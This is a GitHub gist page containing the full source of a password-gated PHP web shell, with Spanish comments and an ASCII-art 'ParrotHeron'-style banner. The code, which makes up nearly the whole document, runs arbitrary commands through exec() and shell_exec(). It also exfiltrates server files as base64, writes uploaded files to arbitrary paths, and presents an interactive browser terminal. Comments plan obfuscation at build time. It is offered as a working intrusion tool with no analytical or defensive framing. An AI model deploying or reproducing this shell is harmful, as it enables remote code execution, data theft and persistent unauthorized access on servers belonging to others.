Last active
December 30, 2024 19:51
-
-
Save j0rd1s3rr4n0/d4f213df686d400a39b88a469ec28405 to your computer and use it in GitHub Desktop.
WebShell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php error_reporting (0);?> | |
| <?php | |
| /* | |
| Recomendacion validacion: | |
| en sqlite | |
| bcrypt | |
| multiple passwords, cookies, username, password, | |
| generar fake multiple users | |
| ofuscar el codigo en build | |
| */ | |
| session_start(); | |
| $password = "751cb3f4aa17c36186f4856c8982bf27"; | |
| if($_POST['password']){ | |
| if(md5($_POST['password']) == $password){ | |
| $_SESSION['password'] = "alm"; | |
| }else{ | |
| echo "<span style='color:red;font-weight:bold;'>La contraseña es incorrecta</span>"; | |
| }} | |
| if(!$_SESSION['password']){ | |
| ?> | |
| <style> | |
| @import url(http://weloveiconfonts.com/api/?family=entypo); | |
| @import url(https://fonts.googleapis.com/css?family=Roboto); | |
| /* zocial */ | |
| [class*="entypo-"]:before { | |
| font-family: 'entypo', sans-serif; | |
| } | |
| input{ | |
| text-align:center; | |
| } | |
| *, | |
| *:before, | |
| *:after { | |
| -moz-box-sizing: border-box; | |
| -webkit-box-sizing: border-box; | |
| box-sizing: border-box; | |
| } | |
| h2 { | |
| color:rgba(255,255,255,.8); | |
| margin-left:12px; | |
| } | |
| body { | |
| background: #272125; | |
| font-family: 'Roboto', sans-serif; | |
| } | |
| form { | |
| position:relative; | |
| margin: 50px auto; | |
| width: 380px; | |
| height: auto; | |
| } | |
| input { | |
| padding: 16px; | |
| border-radius:7px; | |
| border:0px; | |
| background: rgba(255,255,255,.2); | |
| display: block; | |
| margin: 15px; | |
| width: 300px; | |
| color:white; | |
| font-size:18px; | |
| height: 54px; | |
| } | |
| input:focus { | |
| outline-color: rgba(0,0,0,0); | |
| background: rgba(255,255,255,.95); | |
| color: #e74c3c; | |
| } | |
| button { | |
| float:right; | |
| height: 121px; | |
| width: 50px; | |
| border: 0px; | |
| background: #e74c3c; | |
| border-radius:7px; | |
| padding: 10px; | |
| color:white; | |
| font-size:22px; | |
| } | |
| .inputUserIcon { | |
| position:absolute; | |
| top:68px; | |
| right: 80px; | |
| color:white; | |
| } | |
| .inputPassIcon { | |
| position:absolute; | |
| top:136px; | |
| right: 80px; | |
| color:white; | |
| } | |
| input::-webkit-input-placeholder { | |
| color: white; | |
| } | |
| input:focus::-webkit-input-placeholder { | |
| color: #e74c3c; | |
| } | |
| </style> | |
| <center style="vertical-align: middle;padding-top: 20%;"> | |
| <h2>Restrited Acces</h2> | |
| <form style="margin:12px;" name="form1" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>"> | |
| <input type="password" name="password" placeholder="***********"> | |
| <input type="submit" name="Submit" value="Login!"></form> | |
| </center> | |
| <?php | |
| }else{ | |
| if($_GET['desconectar']){ | |
| session_destroy(); | |
| exit("<span style='color:green;'>Has sido desconectado correctamente</span><meta http-equiv='refresh' content='0'/>"); | |
| } | |
| ?> | |
| <?php | |
| function featureShell($cmd, $cwd) { | |
| $stdout = array(); | |
| if (preg_match("/^\s*cd\s*$/", $cmd)) { | |
| // pass | |
| } elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) { | |
| chdir($cwd); | |
| preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match); | |
| chdir($match[1]); | |
| } elseif (preg_match("/^\s*download\s+[^\s]+\s*(2>&1)?$/", $cmd)) { | |
| chdir($cwd); | |
| preg_match("/^\s*download\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match); | |
| return featureDownload($match[1]); | |
| } else { | |
| chdir($cwd); | |
| exec($cmd, $stdout); | |
| } | |
| return array( | |
| "stdout" => $stdout, | |
| "cwd" => getcwd() | |
| ); | |
| } | |
| function featurePwd() { | |
| return array("cwd" => getcwd()); | |
| } | |
| function featureHint($fileName, $cwd, $type) { | |
| chdir($cwd); | |
| if ($type == 'cmd') { | |
| $cmd = "compgen -c $fileName"; | |
| } else { | |
| $cmd = "compgen -f $fileName"; | |
| } | |
| $cmd = "/bin/bash -c \"$cmd\""; | |
| $files = explode("\n", shell_exec($cmd)); | |
| return array( | |
| 'files' => $files, | |
| ); | |
| } | |
| function featureDownload($filePath) { | |
| $file = @file_get_contents($filePath); | |
| if ($file === FALSE) { | |
| return array( | |
| 'stdout' => array('File not found / no read permission.'), | |
| 'cwd' => getcwd() | |
| ); | |
| } else { | |
| return array( | |
| 'name' => basename($filePath), | |
| 'file' => base64_encode($file) | |
| ); | |
| } | |
| } | |
| function featureUpload($path, $file, $cwd) { | |
| chdir($cwd); | |
| $f = @fopen($path, 'wb'); | |
| if ($f === FALSE) { | |
| return array( | |
| 'stdout' => array('Invalid path / no write permission.'), | |
| 'cwd' => getcwd() | |
| ); | |
| } else { | |
| fwrite($f, base64_decode($file)); | |
| fclose($f); | |
| return array( | |
| 'stdout' => array('Done.'), | |
| 'cwd' => getcwd() | |
| ); | |
| } | |
| } | |
| if (isset($_GET["feature"])) { | |
| $response = NULL; | |
| switch ($_GET["feature"]) { | |
| case "shell": | |
| $cmd = $_POST['cmd']; | |
| if (!preg_match('/2>/', $cmd)) { | |
| $cmd .= ' 2>&1'; | |
| } | |
| $response = featureShell($cmd, $_POST["cwd"]); | |
| break; | |
| case "pwd": | |
| $response = featurePwd(); | |
| break; | |
| case "hint": | |
| $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']); | |
| break; | |
| case 'upload': | |
| $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']); | |
| } | |
| header("Content-Type: application/json"); | |
| echo json_encode($response); | |
| die(); | |
| } | |
| ?><!DOCTYPE html> | |
| <html> | |
| <head> | |
| <meta charset="UTF-8" /> | |
| <title><?php echo get_current_user();?>@<?php echo gethostname();?>:~#</title> | |
| <meta name="viewport" content="width=device-width, initial-scale=1.0" /> | |
| <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Ubuntu:regular,bold&subset=Latin"> | |
| <link rel="icon" type="image/png" href="<?php | |
| if(PHP_OS == 'WINNT'){ | |
| echo 'https://upload.wikimedia.org/wikipedia/commons/thumb/0/0a/Unofficial_Windows_logo_variant_-_2002%E2%80%932012_%28Multicolored%29.svg/1161px-Unofficial_Windows_logo_variant_-_2002%E2%80%932012_%28Multicolored%29.svg.png'; | |
| }elseif(PHP_OS == 'Linux'){ | |
| echo 'https://upload.wikimedia.org/wikipedia/commons/thumb/2/2b/Tux-simple.svg/154px-Tux-simple.svg.png'; | |
| }elseif(PHP_OS == 'Darwin'){ | |
| echo 'https://www.pngall.com/wp-content/uploads/4/MacOS-PNG-Clipart.png'; | |
| }elseif(PHP_OS == 'FreeBSD'){ | |
| echo 'https://seeklogo.com/images/F/freebsd-logo-FCF8F13ACE-seeklogo.com.png'; | |
| } | |
| else{ | |
| echo 'http://gingerbolt.com/wp-content/uploads/2016/10/Honeypot.png'; | |
| } | |
| ?>"> | |
| <style> | |
| html, body { | |
| margin: 0; | |
| padding: 0; | |
| background: #333; | |
| color: #eee; | |
| font-family: monospace; | |
| } | |
| #shell { | |
| background: #222; | |
| max-width: 90vw; | |
| max-height: 90vh; | |
| height: 90vh; | |
| margin: 50px auto 0 auto; | |
| box-shadow: 0 0 5px rgb(0 0 0 / 30%); | |
| font-size: 10pt; | |
| display: flex; | |
| flex-direction: column; | |
| align-items: stretch; | |
| border-radius: 25px; | |
| } | |
| #shell-content { | |
| height: 500px; | |
| overflow: auto; | |
| padding: 5px; | |
| white-space: pre-wrap; | |
| flex-grow: 1; | |
| } | |
| #shell-logo { | |
| font-weight: bold; | |
| color: #FF4180; | |
| text-align: center; | |
| } | |
| @media (max-width: 991px) { | |
| #shell-logo { | |
| display: none; | |
| } | |
| html, body, #shell { | |
| height: 100%; | |
| width: 100%; | |
| max-width: none; | |
| } | |
| #shell { | |
| margin-top: 0; | |
| } | |
| } | |
| @media (max-width: 767px) { | |
| #shell-input { | |
| flex-direction: column; | |
| } | |
| } | |
| .shell-prompt { | |
| font-weight: bold; | |
| color: #75DF0B; | |
| } | |
| .shell-prompt > span { | |
| color: #1BC9E7; | |
| } | |
| #shell-input { | |
| display: flex; | |
| box-shadow: 0 -1px 0 rgb(0 0 0 / 30%); | |
| border-top: rgba(255, 255, 255, .05) solid 1px; | |
| font-size: 15pt; | |
| padding: 20px; | |
| } | |
| #shell-input > label { | |
| flex-grow: 0; | |
| display: block; | |
| padding: 0 5px; | |
| height: 30px; | |
| line-height: 30px; | |
| } | |
| #shell-input #shell-cmd { | |
| height: 30px; | |
| line-height: 30px; | |
| border: none; | |
| background: transparent; | |
| color: #eee; | |
| font-family: monospace; | |
| font-size: 10pt; | |
| width: 100%; | |
| align-self: center; | |
| font-size:14pt; | |
| font-family: Ubuntu; | |
| } | |
| #shell-input div { | |
| flex-grow: 1; | |
| align-items: stretch; | |
| } | |
| #shell-input input { | |
| outline: none; | |
| } | |
| </style> | |
| <script> | |
| var CWD = null; | |
| var commandHistory = []; | |
| var historyPosition = 0; | |
| var eShellCmdInput = null; | |
| var eShellContent = null; | |
| function _insertCommand(command) { | |
| eShellContent.innerHTML += "\n\n"; | |
| eShellContent.innerHTML += '<span class=\"shell-prompt\">' + genPrompt(CWD) + '</span> '; | |
| eShellContent.innerHTML += escapeHtml(command); | |
| eShellContent.innerHTML += "\n"; | |
| eShellContent.scrollTop = eShellContent.scrollHeight; | |
| } | |
| function _insertStdout(stdout) { | |
| eShellContent.innerHTML += escapeHtml(stdout); | |
| eShellContent.scrollTop = eShellContent.scrollHeight; | |
| } | |
| function featureShell(command) { | |
| _insertCommand(command); | |
| if (/^\s*upload\s+[^\s]+\s*$/.test(command)) { | |
| featureUpload(command.match(/^\s*upload\s+([^\s]+)\s*$/)[1]); | |
| } else if (/^\s*clear\s*$/.test(command)) { | |
| // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer | |
| eShellContent.innerHTML = ''; | |
| } else { | |
| makeRequest("?feature=shell", {cmd: command, cwd: CWD}, function (response) { | |
| if (response.hasOwnProperty('file')) { | |
| featureDownload(response.name, response.file) | |
| } else { | |
| _insertStdout(response.stdout.join("\n")); | |
| updateCwd(response.cwd); | |
| } | |
| }); | |
| } | |
| } | |
| function featureHint() { | |
| if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete | |
| function _requestCallback(data) { | |
| if (data.files.length <= 1) return; // no completion | |
| if (data.files.length === 2) { | |
| if (type === 'cmd') { | |
| eShellCmdInput.value = data.files[0]; | |
| } else { | |
| var currentValue = eShellCmdInput.value; | |
| eShellCmdInput.value = currentValue.replace(/([^\s]*)$/, data.files[0]); | |
| } | |
| } else { | |
| _insertCommand(eShellCmdInput.value); | |
| _insertStdout(data.files.join("\n")); | |
| } | |
| } | |
| var currentCmd = eShellCmdInput.value.split(" "); | |
| var type = (currentCmd.length === 1) ? "cmd" : "file"; | |
| var fileName = (type === "cmd") ? currentCmd[0] : currentCmd[currentCmd.length - 1]; | |
| makeRequest( | |
| "?feature=hint", | |
| { | |
| filename: fileName, | |
| cwd: CWD, | |
| type: type | |
| }, | |
| _requestCallback | |
| ); | |
| } | |
| function featureDownload(name, file) { | |
| var element = document.createElement('a'); | |
| element.setAttribute('href', 'data:application/octet-stream;base64,' + file); | |
| element.setAttribute('download', name); | |
| element.style.display = 'none'; | |
| document.body.appendChild(element); | |
| element.click(); | |
| document.body.removeChild(element); | |
| _insertStdout('Done.'); | |
| } | |
| function featureUpload(path) { | |
| var element = document.createElement('input'); | |
| element.setAttribute('type', 'file'); | |
| element.style.display = 'none'; | |
| document.body.appendChild(element); | |
| element.addEventListener('change', function () { | |
| var promise = getBase64(element.files[0]); | |
| promise.then(function (file) { | |
| makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) { | |
| _insertStdout(response.stdout.join("\n")); | |
| updateCwd(response.cwd); | |
| }); | |
| }, function () { | |
| _insertStdout('An unknown client-side error occurred.'); | |
| }); | |
| }); | |
| element.click(); | |
| document.body.removeChild(element); | |
| } | |
| function getBase64(file, onLoadCallback) { | |
| return new Promise(function(resolve, reject) { | |
| var reader = new FileReader(); | |
| reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); }; | |
| reader.onerror = reject; | |
| reader.readAsDataURL(file); | |
| }); | |
| } | |
| function genPrompt(cwd) { | |
| cwd = cwd || "~"; | |
| var shortCwd = cwd; | |
| if (cwd.split("/").length > 3) { | |
| var splittedCwd = cwd.split("/"); | |
| shortCwd = "…/" + splittedCwd[splittedCwd.length-2] + "/" + splittedCwd[splittedCwd.length-1]; | |
| } | |
| return "<?php echo get_current_user();?>@<?php echo gethostname();?>:<span title=\"" + cwd + "\">" + shortCwd + "</span>#"; | |
| } | |
| function updateCwd(cwd) { | |
| if (cwd) { | |
| CWD = cwd; | |
| _updatePrompt(); | |
| return; | |
| } | |
| makeRequest("?feature=pwd", {}, function(response) { | |
| CWD = response.cwd; | |
| _updatePrompt(); | |
| }); | |
| } | |
| function escapeHtml(string) { | |
| return string | |
| .replace(/&/g, "&") | |
| .replace(/</g, "<") | |
| .replace(/>/g, ">"); | |
| } | |
| function _updatePrompt() { | |
| var eShellPrompt = document.getElementById("shell-prompt"); | |
| eShellPrompt.innerHTML = genPrompt(CWD); | |
| } | |
| function _onShellCmdKeyDown(event) { | |
| switch (event.key) { | |
| case "Enter": | |
| featureShell(eShellCmdInput.value); | |
| insertToHistory(eShellCmdInput.value); | |
| eShellCmdInput.value = ""; | |
| break; | |
| case "ArrowUp": | |
| if (historyPosition > 0) { | |
| historyPosition--; | |
| eShellCmdInput.blur(); | |
| eShellCmdInput.focus(); | |
| eShellCmdInput.value = commandHistory[historyPosition]; | |
| } | |
| break; | |
| case "ArrowDown": | |
| if (historyPosition >= commandHistory.length) { | |
| break; | |
| } | |
| historyPosition++; | |
| if (historyPosition === commandHistory.length) { | |
| eShellCmdInput.value = ""; | |
| } else { | |
| eShellCmdInput.blur(); | |
| eShellCmdInput.focus(); | |
| eShellCmdInput.value = commandHistory[historyPosition]; | |
| } | |
| break; | |
| case 'Tab': | |
| event.preventDefault(); | |
| featureHint(); | |
| break; | |
| } | |
| } | |
| function insertToHistory(cmd) { | |
| commandHistory.push(cmd); | |
| historyPosition = commandHistory.length; | |
| } | |
| function makeRequest(url, params, callback) { | |
| function getQueryString() { | |
| var a = []; | |
| for (var key in params) { | |
| if (params.hasOwnProperty(key)) { | |
| a.push(encodeURIComponent(key) + "=" + encodeURIComponent(params[key])); | |
| } | |
| } | |
| return a.join("&"); | |
| } | |
| var xhr = new XMLHttpRequest(); | |
| xhr.open("POST", url, true); | |
| xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); | |
| xhr.onreadystatechange = function() { | |
| if (xhr.readyState === 4 && xhr.status === 200) { | |
| try { | |
| var responseJson = JSON.parse(xhr.responseText); | |
| callback(responseJson); | |
| } catch (error) { | |
| alert("Error while parsing response: " + error); | |
| } | |
| } | |
| }; | |
| xhr.send(getQueryString()); | |
| } | |
| window.onload = function() { | |
| eShellCmdInput = document.getElementById("shell-cmd"); | |
| eShellContent = document.getElementById("shell-content"); | |
| updateCwd(); | |
| eShellCmdInput.focus(); | |
| }; | |
| </script> | |
| </head> | |
| <body> | |
| <div id="shell"> | |
| <pre id="shell-content"> | |
| <div id="shell-logo"> | |
| .oooooo. ooooooooo. . oooo <span></span> | |
| d' `b `888 `Y88. .o8 `888 <span></span> | |
| d' .d"bd 8 888 .d88' .oooo. oooo d8b .o888oo 888 .oo. .ooooo. ooo. .oo. .ooooo. oooo oooo ooo. .oo. <span></span> | |
| 8 8. 8 .d 888ooo88P' `P )88b `888""8P 888 888P"Y88b d88' `88b `888P"Y88b d88' `88b `888 `888 `888P"Y88b <span></span> | |
| Y. YoP"b' 888 .oP"888 888 888 888 888 888ooo888 888 888 888 888 888 888 888 888 <span></span> | |
| 8. .8 888 d8( 888 888 888 . 888 888 888 .o 888 888 888 888 888 888 888 888 <span></span> | |
| YooooooP o888o `Y888""8o d888b "888" o888o o888o `Y8bod8P' o888o o888o `Y8bod8P' `V88V"V8P' o888o o888o<span></span> | |
| </div> | |
| </pre> | |
| <div id="shell-input"> | |
| <img src="<?php | |
| if(PHP_OS == 'WINNT'){ | |
| echo 'https://upload.wikimedia.org/wikipedia/commons/thumb/0/0a/Unofficial_Windows_logo_variant_-_2002%E2%80%932012_%28Multicolored%29.svg/1161px-Unofficial_Windows_logo_variant_-_2002%E2%80%932012_%28Multicolored%29.svg.png'; | |
| }elseif(PHP_OS == 'Linux'){ | |
| echo 'https://upload.wikimedia.org/wikipedia/commons/thumb/2/2b/Tux-simple.svg/154px-Tux-simple.svg.png'; | |
| }elseif(PHP_OS == 'Darwin'){ | |
| echo 'https://www.pngall.com/wp-content/uploads/4/MacOS-PNG-Clipart.png'; | |
| }elseif(PHP_OS == 'FreeBSD'){ | |
| echo 'https://seeklogo.com/images/F/freebsd-logo-FCF8F13ACE-seeklogo.com.png'; | |
| } | |
| else{ | |
| echo 'http://gingerbolt.com/wp-content/uploads/2016/10/Honeypot.png'; | |
| } | |
| ?>" style="width:45px;height:45px;filter: drop-shadow(0 0 0.75rem white);"><label for="shell-cmd" id="shell-prompt" class="shell-prompt">???</label> | |
| <input id="shell-cmd" name="cmd" onkeydown="_onShellCmdKeyDown(event)"/> | |
| </div> | |
| </div> | |
| </div> | |
| </body> | |
| </html> | |
| <a href="<?php echo $_SERVER['PHP_SELF']; ?>?desconectar=si">Desconectar</a> | |
| <?php | |
| } | |
| ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment